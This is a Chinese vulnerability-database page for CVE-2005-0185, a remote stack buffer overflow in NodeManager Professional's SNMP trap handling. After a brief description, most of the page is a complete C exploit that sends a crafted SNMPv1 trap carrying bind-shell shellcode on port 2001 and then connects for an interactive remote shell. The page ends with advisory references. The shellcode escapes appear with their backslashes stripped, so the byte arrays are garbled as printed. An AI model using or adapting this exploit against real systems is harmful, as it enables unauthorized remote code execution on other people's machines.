NodeManager Professional SNMP Trap处理远程缓冲区溢出攻击
漏洞ID | 1108409 | 漏洞类型 | 缓冲区溢出 |
发布时间 | 2005-01-18 | 更新时间 | 2005-10-20 |
CVE编号 | CVE-2005-0185 |
CNNVD-ID | CNNVD-200505-371 |
漏洞平台 | Windows | CVSS评分 | 7.5 |
|漏洞来源
|漏洞详情
NodeManagerProfessional是一款网络管理监控工具,它可以接收SNMPv1的消息,显示并记录相关的信息。NodeManagerProfessional在处理SNMPTrap报文时存在缓冲区溢出漏洞,远程攻击者可能利用此漏洞在服务器上执行任意指令。
|漏洞EXP
/* Included stdio.h for my compile errors /str0ke */
//**************************************************************************
// NodeManager Professional V2.00 Buffer Overflow Vulnerability
// Bind Shell Exploit for English Win2K/XP
// 21 Dec 2004
//
// NodeManager Professional is a network management and monitoring tool.
// It receives SNMPv1 traps and displays them on screen and logs them to
// a file. NodeManager Professional V2.00 has a stack overflow
// vulnerability that can be exploited by sending a specially crafted
// SNMPv1 trap.
//
// NodeManager Professional allows the user to use a format string to
// customize how each received trap is logged. For example, the default
// format string for the LinkDown event is
//
// "Snmp Trap LinkDown (EnterPrise=%EPRISE ObjectID=%OID Value=%DATA)"
//
// When a LinkDown-Trap packet is received, the various placeholders
// (e.g. %OID, %DATA) will be replaced with the received values. The
// resulting string is then displayed on screen and written out to a log file.
// The various fields from the received LinkDown-Trap UDP packet is first copied
// to global buffers in the .data segment. When the format string is parsed,
// each received value is first copied to a 512-byte local stack buffer before
// it is concatenated to the final string.
//
// By sending more than 512 bytes in the Trap DATA field, it is possible
// to overflow the stack buffer and overwrite the EIP.
//
//
// This exploit code binds shell on port 2001 of a system running a vulnerable
// version of NodeManager Professional.
//
// Advisory
// http://www.security.org.sg/vuln/nodemanager200.html
//
// Greetz: snooq, sk, and all guys at SIG^2 G-TEC
// (http://www.security.org.sg/webdocs/g-tec.html)
//
//**************************************************************************
#include <windows.h>
#include <winsock2.h>
#include <string.h>
#include <malloc.h>
#include <conio.h>
#include <stdlib.h>
#include <stdio.h>
#pragma comment(lib,"ws2_32.lib")
unsigned char evilTrap[] =
"x30x82x02x44x02x01x00x04x06x70x75x62x6Cx69x63xA4"
"x82x02x35x06x09x2Bx06x01x02x03x04x05x06x07x40x04"
"x7Fx00x00x01x02x01x02x02x01x00x43x02x12x34x30x82"
"x02x16x30x82x02x12x06x08x2Bx06x01x02x03x04x05x06"
"x04x82x02x04x41x41x41x41x41x41x41x41x90x90x90xCC"
// bindshell on port 2001
"xEBx62x55x8BxECx51x56x57x8Bx5Dx08x8Bx73x3Cx8Bx74"
"x33x78x03xF3x8Bx7Ex20x03xFBx8Bx4Ex18x56x33xD2x8B"
"x37x03x75x08x33xDBx33xC0xACx85xC0x74x09xC1xCBx0C"
"xD1xCBx03xD8xEBxF0x3Bx5Dx0Cx74x0Bx83xC7x04x42xE2"
"xDEx5Ex33xC0xEBx17x5Ex8Bx7Ex24x03x7Dx08x66x8Bx04"
"x57x8Bx7Ex1Cx03x7Dx08x8Bx04x87x03x45x08x5Fx5Ex59"
"x8BxE5x5DxC3x55x8BxECx33xC9xB1xC8x2BxE1x32xC0x8B"
"xFCxF3xAAxB1x30x64x8Bx01x8Bx40x0Cx8Bx70x1CxADx8B"
"x58x08x89x5DxFCx68x8Ex4Ex0ExECxFFx75xFCxE8x70xFF"
"xFFxFFx83xC4x08xBBxAAxAAx6Cx6CxC1xEBx10x53x68x33"
"x32x2Ex64x68x77x73x32x5Fx54xFFxD0x89x45xF8xEBx35"
"x5Ex8Dx7DxF4x33xC9xB1x09xFFx36xFFx75xFCxE8x40xFF"
"xFFxFFx83xC4x08x85xC0x75x0Ex90xFFx36xFFx75xF8xE8"
"x2ExFFxFFxFFx83xC4x08x89x07x33xC0xB0x04x03xF0x2B"
"xF8xE2xD5xEBx29xE8xC6xFFxFFxFFx72xFExB3x16x35x54"
"x8AxA1xA4xADx2ExE9xA4x1Ax70xC7xD9x09xF5xADxCBxED"
"xFCx3Bx7ExD8xE2x73xE7x79xC6x79xADxD9x05xCEx54x6A"
"x02xFFx55xE0x33xC0x50x50x50x50x6Ax01x6Ax02xFFx55"
"xE4x89x45xD0x33xC0x50xB8xFDxFFxF8x2Ex83xF0xFFx50"
"x8BxC4x6Ax10x50xFFx75xD0xFFx55xE8x6Ax05xFFx75xD0"
"xFFx55xECx85xC0x75x68x8BxCCx6Ax10x8BxDCx33xC0x50"
"x50x53x51xFFx75xD0xFFx55xF0x8BxD0x5Bx83xF0xFFx74"
"x4Ex8BxFCx33xC9xB1x64x33xC0xF3xAAxC6x04x24x44x66"
"xC7x44x24x2Cx01x01x89x54x24x38x89x54x24x3Cx89x54"
"x24x40x8BxC4x8Dx58x44xB9xFFx63x6Dx64xC1xE9x08x51"
"x8BxCCx52x53x53x50x33xC0x50x50x50x6Ax01x50x50x51"
"x50xFFx55xF4x5Bx6AxFFxFFx33xFFx55xD4xFFx55xD8xFF"
"x75xD0xFFx55xD8x50xFFx55xDCx41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41"
"x9Cx48x43x00"; // hardcoded return address (in data segment)
void shell(int sockfd)
{
char buffer[1024];
fd_set rset;
FD_ZERO(&rset);
for(;;)
{
if(kbhit() != 0)
{
fgets(buffer, sizeof(buffer) - 2, stdin);
send(sockfd, buffer, strlen(buffer), 0);
}
FD_ZERO(&rset);
FD_SET(sockfd, &rset);
timeval tv;
tv.tv_sec = 0;
tv.tv_usec = 50;
if(select(0, &rset, NULL, NULL, &tv) == SOCKET_ERROR)
{
printf("select errorn");
break;
}
if(FD_ISSET(sockfd, &rset))
{
int n;
ZeroMemory(buffer, sizeof(buffer));
if((n = recv(sockfd, buffer, sizeof(buffer), 0)) <= 0)
{
printf("EOFn");
return;
}
else
{
fwrite(buffer, 1, n, stdout);
}
}
}
}
void printUsage(char *filename)
{
printf("nUsage: %s <test type> <ip addr>nn", filename);
printf("Test Type : 1 - Crashn");
printf(" 2 - BindShell on Port 2001nn");
}
int main(int argc, char* argv[])
{
int sock;
WSADATA wsd;
if(argc != 3)
{
printUsage(argv[0]);
return 1;
}
int testType = atoi(argv[1]);
if(testType != 1 && testType != 2)
{
printUsage(argv[0]);
return 1;
}
if (WSAStartup(MAKEWORD(2,2), &wsd) != 0)
{
printf("WSAStartup() failed: %dn", GetLastError());
return -1;
}
sock = socket(AF_INET, SOCK_DGRAM, 0);
if(sock < 0)
{
printf("socket() error!n");
WSACleanup();
return 1;
}
struct sockaddr_in dest;
dest.sin_family = AF_INET;
dest.sin_port = htons(162);
dest.sin_addr.s_addr = inet_addr(argv[2]);
struct sockaddr_in local;
local.sin_family = AF_INET;
local.sin_port = htons(0);
local.sin_addr.s_addr = htonl(INADDR_ANY);
if(bind(sock, (struct sockaddr *)&local, sizeof(local)) < 0)
{
printf("Exploit Failed. SOCKET_ERROR return in bind() call.n");
closesocket(sock);
WSACleanup();
return 1;
}
if(testType == 1)
{
DWORD *ptr = (DWORD *)(evilTrap + sizeof(evilTrap) - 5);
*ptr = 0x41414141;
}
int structLen = sizeof(dest);
int sendSize = sendto(sock, (char *)evilTrap, sizeof(evilTrap)-1, 0, (struct sockaddr *)&dest, structLen);
if(sendSize < 0)
{
printf("Exploit Failed. SOCKET_ERROR return in sendto() call.n");
}
else
printf("Exploit Sent. Size: %d bytesn", sendSize);
if(testType == 2)
printf("Connecting to port 2001 on target. . .");
Sleep(2000);
closesocket(sock);
if(testType == 2)
{
struct sockaddr_in sin;
//================================= Connect to the target ==============================
sock = socket(AF_INET, SOCK_STREAM, 0);
if(sock == INVALID_SOCKET)
{
printf("nInvalid socket return in socket() call.n");
WSACleanup();
return -1;
}
sin.sin_family = AF_INET;
sin.sin_port = htons(2001);
sin.sin_addr.s_addr = inet_addr(argv[2]);
if(connect(sock, (sockaddr *)&sin, sizeof(sin)) == SOCKET_ERROR)
{
printf("nExploit Failed. SOCKET_ERROR return in connect() call.n");
closesocket(sock);
WSACleanup();
return -1;
}
printf("nnSuccess!nn");
shell(sock);
closesocket(sock);
}
WSACleanup();
return 0;
}
// milw0rm.com [2005-01-18]
|参考资料
来源:XF
名称:nodemanager-linkdown-bo(18937)
链接:http://xforce.iss.net/xforce/xfdb/18937
来源:MISC
链接:http://www.security.org.sg/vuln/nodemanager200.html
来源:SECUNIA
名称:13881
链接:http://secunia.com/advisories/13881/
来源:BUGTRAQ
名称:20050117[SIG^2G-TEC]NodeManagerProfessionalV2.00BufferOverflowVulnerability
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=110599796118583&w;=2
来源:BID
名称:12283
链接:http://www.securityfocus.com/bid/12283
来源:SECTRACK
名称:1012915
链接:http://securitytracker.com/id?1012915
相关推荐: Tip File Locking Denial Of Service Vulnerability
Tip File Locking Denial Of Service Vulnerability 漏洞ID 1101761 漏洞类型 Failure to Handle Exceptional Conditions 发布时间 2002-07-18 更新时间 2…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666